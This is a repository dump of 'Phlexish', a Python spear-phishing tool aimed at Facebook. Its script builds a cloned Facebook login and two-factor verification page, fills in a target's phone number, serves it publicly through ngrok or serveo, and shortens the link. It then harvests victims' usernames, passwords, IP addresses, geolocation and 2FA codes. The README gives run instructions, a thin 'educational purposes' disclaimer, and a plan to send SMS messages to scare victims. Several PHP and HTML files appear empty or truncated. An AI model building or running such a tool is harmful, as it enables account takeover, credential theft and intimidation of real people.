├── .gitignore ├── LICENSE ├── Phlexish.py ├── README.md ├── SERVER ├── index.html ├── ip.php ├── login.php ├── mobile.html ├── verify.html └── verifycode.php ├── Settings.ini ├── WebPages ├── facebook │ ├── index.html │ ├── login.php │ ├── mobile.html │ ├── verify.html │ └── verifycode.php └── ip.php ├── base └── Configurations.py ├── data └── index.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Knightsec 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Phlexish.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/env python3.7 2 | 3 | import time 4 | import os 5 | import sys 6 | from sys import argv 7 | import re 8 | import json 9 | import multiprocessing 10 | import requests 11 | from base.Configurations import * 12 | 13 | from urllib.request import urlopen 14 | from subprocess import check_output, CalledProcessError 15 | 16 | import subprocess 17 | import threading 18 | 19 | from data.index import * 20 | BLUE = "\033[1;34m" 21 | RED = "\033[1;31m" 22 | YELLOW = "\033[1;33m" 23 | CYAN = "\033[1;96m" 24 | RESET = "\033[0m" 25 | PINK = "\033[1;95m" 26 | WHITE = '\033[46m' 27 | os.system('resize -s 20 72 > /dev/null &') 28 | 29 | config = readConfig() 30 | logFile = None 31 | didBackground = config.get("Settings","DidBackground") 32 | for arg in argv: 33 | if arg=="--nolog": #If true - don't log 34 | didBackground = False 35 | if config.get("Settings", "DidBackground") == "True": 36 | os.system('touch log.txt && chmod 777 log.txt') 37 | logFile = open("log.txt", "w") 38 | 39 | 40 | def clear(): 41 | os.system("clear") 42 | def banner(): 43 | print(RED+"██ ▄█▀ ███▄ █ ██▓ ▄████ ██░ ██ ▄▄▄█████▓ ██████ ▓█████ ▄████▄"+RESET) 44 | print(RED+"██▄█▒ ██ ▀█ █ ▓██▒ ██▒ ▀█▒▓██░ ██▒▓ ██▒ ▓▒▒██ ▒ ▓█ ▀ ▒██▀ ▀█"+RESET) 45 | print(RED+"▓███▄░ ▓██ ▀█ ██▒▒██▒▒██░▄▄▄░▒██▀▀██░▒ ▓██░ ▒░░ ▓██▄ ▒███ ▒▓█ ▄"+RESET) 46 | print(RED+"▓██ █▄ ▓██▒ ▐▌██▒░██░░▓█ ██▓░▓█ ░██ ░ ▓██▓ ░ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒"+RESET) 47 | print(RED+"▒██▒ █▄▒██░ ▓██░░██░░▒▓███▀▒░▓█▒░██▓ ▒██▒ ░ ▒██████▒▒░▒████▒▒ ▓███▀ ░"+RESET) 48 | print(RED+"▒ ▒▒ ▓▒░ ▒░ ▒ ▒ ░▓ ░▒ ▒ ▒ ░░▒░▒ ▒ ░░ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░"+RESET) 49 | print(RED+"░ ░▒ ▒░░ ░░ ░ ▒░ ▒ ░ ░ ░ ▒ ░▒░ ░ ░ ░ ░▒ ░ ░ ░ ░ ░ ░ ▒"+RESET) 50 | print(RED+" ▒ ▒░ ▒ ░ ▒ ░ ░ ░ ░ ▒"+RESET) 51 | print("\n") 52 | time.sleep(0.35) 53 | #Animation copied from Kickthemout#not used 54 | def CYANAnimation(text): 55 | try: 56 | global stopCYANAnimation 57 | i = 0 58 | while stopCYANAnimation is not True: 59 | tempText = list(text) 60 | if i >= len(tempText): 61 | i = 0 62 | tempText[i] = tempText[i].upper() 63 | tempText = ''.join(tempText) 64 | sys.stdout.write(CYAN + tempText + '\r' + RESET) 65 | sys.stdout.flush() 66 | i += 1 67 | time.sleep(0.1) 68 | except: 69 | os._exit(1) 70 | def PINKAnimation(text): 71 | try: 72 | global stopPINKAnimation 73 | i = 0 74 | while stopPINKAnimation is not True: 75 | tempText = list(text) 76 | if i >= len(tempText): 77 | i = 0 78 | tempText[i] = tempText[i].upper() 79 | tempText = ''.join(tempText) 80 | sys.stdout.write(PINK + tempText + '\r' + RESET) 81 | sys.stdout.flush() 82 | i += 1 83 | time.sleep(0.1) 84 | except: 85 | os._exit(1) 86 | #not used 87 | def YELLOWAnimation(text): 88 | try: 89 | global stopYELLOWAnimation 90 | i = 0 91 | while stopYELLOWAnimation is not True: 92 | tempText = list(text) 93 | if i >= len(tempText): 94 | i = 0 95 | tempText[i] = tempText[i].upper() 96 | tempText = ''.join(tempText) 97 | sys.stdout.write(YELLOW + tempText + '\r' + RESET) 98 | sys.stdout.flush() 99 | i += 1 100 | time.sleep(0.1) 101 | except: 102 | os._exit(1) 103 | def sergrok(): 104 | clear() 105 | banner() 106 | time.sleep(0.35) 107 | print(CYAN +"1.Serveo\n2.Ngrok\n9.Exit"+RESET) 108 | print("") 109 | choose_sk = input(PINK+"Choose > "+RESET) 110 | try: 111 | int(choose_sk) 112 | except ValueError: 113 | sergrok() 114 | try: 115 | if int(choose_sk) == 9: 116 | exit() 117 | if int(choose_sk) == 1: 118 | 119 | runServeo() 120 | elif int(choose_sk) == 2: 121 | 122 | runNgrok() 123 | 124 | except ValueError: 125 | sergrok() 126 | def runServer(): 127 | os.system("cd SERVER && php -S 127.0.0.1:8877 > /dev/null 2>&1 &") 128 | def facebook(): 129 | clear() 130 | banner() 131 | global stopPINKAnimation 132 | stopPINKAnimation = False 133 | 134 | phone = input(YELLOW+"Target's Phone Number (with country tag) -> "+RESET) 135 | t = threading.Thread(target=PINKAnimation, args=('Preparing Phone number...',)) 136 | t.daemon = True 137 | t.start() 138 | 139 | time.sleep(3) 140 | stopPINKAnimation = True 141 | os.system("rm -r SERVER/") 142 | 143 | subprocess.call(['mkdir','-p','SERVER/']) 144 | 145 | filedata = str(Main_Facebook) 146 | filedata = filedata.replace('[phone]', str(phone)) 147 | 148 | with open('./SERVER/verify.html', 'w') as file: 149 | file.write(filedata) 150 | file.close() 151 | #i could use copy_tree but i was too lazy to write less #NOSENSE 152 | os.system("cp WebPages/facebook/login.php SERVER/") 153 | os.system("cp WebPages/facebook/mobile.html SERVER/") 154 | os.system("cp WebPages/facebook/index.html SERVER/") 155 | os.system("cp WebPages/facebook/verifycode.php SERVER/") 156 | os.system("cp WebPages/ip.php SERVER/ && touch SERVER/usernames.txt && touch SERVER/ip.txt && touch SERVER/code.txt") 157 | 158 | 159 | os.system("chmod -R 777 SERVER/") 160 | 161 | time.sleep(2) 162 | sergrok() 163 | def main(): 164 | clear() 165 | banner() 166 | time.sleep(0.35) 167 | print((RED+"1.""{0}Advanced Spare Phishing{1}\n"+RED+"9.""{0}Exit{1}\n").format(YELLOW, RESET)) 168 | print("") 169 | choice = input(PINK+"Choose > " +RESET) 170 | if not choice.isdigit(): 171 | main() 172 | else: 173 | choice = int(choice) 174 | try: 175 | int(choice) 176 | except ValueError: 177 | main() 178 | try: 179 | if int(choice) == 0: 180 | print("") 181 | print (RED+"Exiting... "+RESET) 182 | time.sleep(1) 183 | exit() 184 | if int(choice) == 1: 185 | 186 | facebook() 187 | 188 | elif int(choice) == 9: 189 | exit() 190 | else: 191 | main() 192 | except ValueError: 193 | main() 194 | def runNgrok(): 195 | os.system('cd SERVER/ && ngrok http 8877 > /dev/null &') 196 | while True: 197 | time.sleep(2) 198 | os.system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url') 199 | urlFile = open('ngrok.url', 'r') 200 | url = urlFile.read() 201 | urlFile.close() 202 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: 203 | print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(RED, RESET, BLUE) + url + "{1}".format(RED, RESET, BLUE)) 204 | link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https') 205 | print("\n {0}[{1}*{0}]{1} Shorten URL: {2}".format(RED, RESET, BLUE) + link + "{1}".format(RED, RESET, BLUE)) 206 | print("\n") 207 | os.system("rm -Rf ngrok.url") 208 | break 209 | continue 210 | #Script semi-copied from DarksecDevelopers! 211 | 212 | 213 | def runServeo(): 214 | link1 = input(("\n {0}Custom Subdomain name -> {1}").format(RED, RESET)) 215 | if not ".serveo.net" in link1: 216 | link1 += ".serveo.net" 217 | else: 218 | pass 219 | os.system('cd SERVER/') 220 | os.system('ssh -R %s:80:localhost:8877 serveo.net > link.url 2> /dev/null &' % (link1)) 221 | while True: 222 | 223 | time.sleep(2) 224 | os.system('cat link.url | grep "https://[0-9a-z]*\.serveo.net" -oh > serveo.url') 225 | urlFile = open('serveo.url', 'r') 226 | url = urlFile.read() 227 | urlFile.close() 228 | if re.match("https://[0-9a-z]*\.serveo.net", url) != None: 229 | print("\n {0}[{1}*{0}]{1} Serveo URL: {2}".format(RED, RESET, BLUE) + url + "{1}".format(RED, RESET, BLUE)) 230 | os.system("rm -Rf link.url, serveo.url") 231 | break 232 | continue 233 | 234 | 235 | 236 | #CREDGET IS FROM HIDDENEYE COPIED 100/100 - sorry... 237 | def credget(): 238 | print("Getting creds!") 239 | while True: 240 | with open('SERVER/usernames.txt') as credkey: 241 | cred_line = credkey.read().rstrip() 242 | if len(cred_line) != 0: 243 | writeLog('{0}______________________________________________________________________{1}'.format(RED, RESET)) 244 | writeLog((' {0}[ CREDENTIALS FOUND ]{1}:\n {0}{2}{1}').format(BLUE, RESET, cred_line)) 245 | os.system('rm -rf SERVER/usernames.txt && touch SERVER/usernames.txt') 246 | writeLog('{0}______________________________________________________________________{1}'.format(RED, RESET)) 247 | 248 | credkey.close() 249 | 250 | 251 | with open('SERVER/ip.txt') as creds: 252 | lines = creds.read().rstrip() 253 | if len(lines) != 0: 254 | ip = re.match('Victim Public IP: (.*?)\n', lines).group(1) 255 | user = re.match('Current logged in user: (a-z0-9)\n', lines) 256 | resp = urlopen('https://ipinfo.io/{0}/json'.format(ip)) 257 | ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8')) 258 | if 'bogon' in ipinfo: 259 | log('======================================================================'.format(RED, RESET)) 260 | log((' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}{2}{1}').format(BLUE, RESET, lines)) 261 | else: 262 | matchObj = re.match('^(.*?),(.*)$', ipinfo['loc']) 263 | latitude = matchObj.group(1) 264 | longitude = matchObj.group(2) 265 | writeLog('======================================================================'.format(RED, RESET)) 266 | writeLog((' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}{2}{1}').format(BLUE, RESET, lines)) 267 | writeLog((' \n{0}Longitude: {2} \nLatitude: {3}{1}').format(BLUE, RESET, longitude, latitude)) 268 | writeLog((' \n{0}ISP: {2} \nCountry: {3}{1}').format(BLUE, RESET, ipinfo['org'], ipinfo['country'])) 269 | writeLog((' \n{0}Region: {2} \nCity: {3}{1}').format(BLUE, RESET, ipinfo['region'], ipinfo['city'])) 270 | os.system('rm -rf SERVER/ip.txt && touch SERVER/ip.txt') 271 | writeLog('======================================================================'.format(RED, RESET)) 272 | 273 | creds.close() 274 | 275 | with open('SERVER/code.txt') as creds: 276 | lines = creds.read().rstrip() 277 | if len(lines) != 0: 278 | writeLog('{0}______________________________________________________________________{1}'.format(RED, RESET)) 279 | writeLog((' {0}[ GETTING THE CODE ]{1}:\n {0}%s{1}').format(BLUE, RESET) % lines) 280 | os.system('rm -rf SERVER/code.txt && touch SERVER/code.txt') 281 | writeLog('{0}______________________________________________________________________{1}'.format(RED, RESET)) 282 | 283 | 284 | creds.close() 285 | 286 | def writeLog(ctx): #Writing log 287 | if config.get("Settings", "DidBackground") == "True": #if didBackground == True, write 288 | logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(BLUE, "").replace(RESET, "") + "\n") 289 | print(ctx) 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | if __name__ == "__main__": 300 | try: 301 | main() 302 | 303 | multiprocessing.Process(target=runServer).start() 304 | credget() 305 | except KeyboardInterrupt: 306 | print("") 307 | print (RED+"Exiting... "+RESET) 308 | time.sleep(1) 309 | os.system("pkill -9 ngrok") 310 | os.system("pkill -9 php") 311 | exit() 312 | 313 | 314 | 315 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Phlexish OUTDATED! 2 | Advanced Spear Phishing for Facebook with 2 factor authentication bypass! 3 | TOOL IS NO LONGER UPDATED ! PLEASE CONTRIBUTE TO KEEP THIS TOOL UP TO DATE! 4 | 5 | --HOWTORUN-- 6 | 1. ```git clone https://github.com/lulzsechackz/Phlexish.git``` 7 | 2. ```cd Phlexish``` 8 | 3. ```pip3.7 install -r requirements.txt``` 9 | --OR-- 10 | ```pip3 install -r requirements.txt``` 11 | 4. ```python3.7 Phlexish.py``` 12 | 5. Have FUN! 13 | # Project under MIT License! 14 | # I am not responsable for your actions! This tool is made only for educational purposes! 15 | 16 | ``` 17 | #################################################### 18 | # Phlexish made and lit up by <>,.,Knightsec,.,<> # 19 | # # 20 | # # 21 | # Instagram @katoyama_official # 22 | # Github: KnightSec-Ofiicial # 23 | # Youtube: # 24 | # www.youtube.com/channel/UCG3kQUplyR1ktq702VpWFQg # 25 | # # 26 | # More repositories soon :D # 27 | # # 28 | # # 29 | # # 30 | #################################################### 31 | ⟋﹈﹈⟍ 32 | ⎠ ⟋⎪⟍ 33 | ⟋⎪⎛⎪⎞⎪⟍ 34 | ⟋⎪⸦⎪⎝⎪⎠⎪⸧⎪⟍ 35 | ⟍____⟋⟍____⟋ 36 | ⟋ 〜^〜 ⟍ 37 | ⟍ ▔▔▔▔▔ ⟋ 38 | ⟍ ⧱ ⟋ 39 | ⟍__⧱__⟋ 40 | *Knightsec* 1.3 41 | ``` 42 | ##TO DO!!! 43 | 1.- Add multiple social media 2-factor phishing sites. 44 | 2.- Send some sms to victim to scare him. 45 | 3.- Improve the tool every possible way. 46 | -------------------------------------------------------------------------------- /SERVER/ip.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /SERVER/mobile.html: -------------------------------------------------------------------------------- 1 | Facebook – log in or sign up

Facebook

facebook
English (UK)
پښتو
हिन्दी
Español
اردو
العربية
বাংলা
Facebook ©2018
-------------------------------------------------------------------------------- /SERVER/verifycode.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Settings.ini: -------------------------------------------------------------------------------- 1 | [Settings] 2 | language = en 3 | didbackground = True -------------------------------------------------------------------------------- /WebPages/facebook/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /WebPages/facebook/mobile.html: -------------------------------------------------------------------------------- 1 | Facebook – log in or sign up

Facebook

facebook
English (UK)
پښتو
हिन्दी
Español
اردو
العربية
বাংলা
Facebook ©2018
-------------------------------------------------------------------------------- /WebPages/facebook/verifycode.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /WebPages/ip.php: -------------------------------------------------------------------------------- 1 |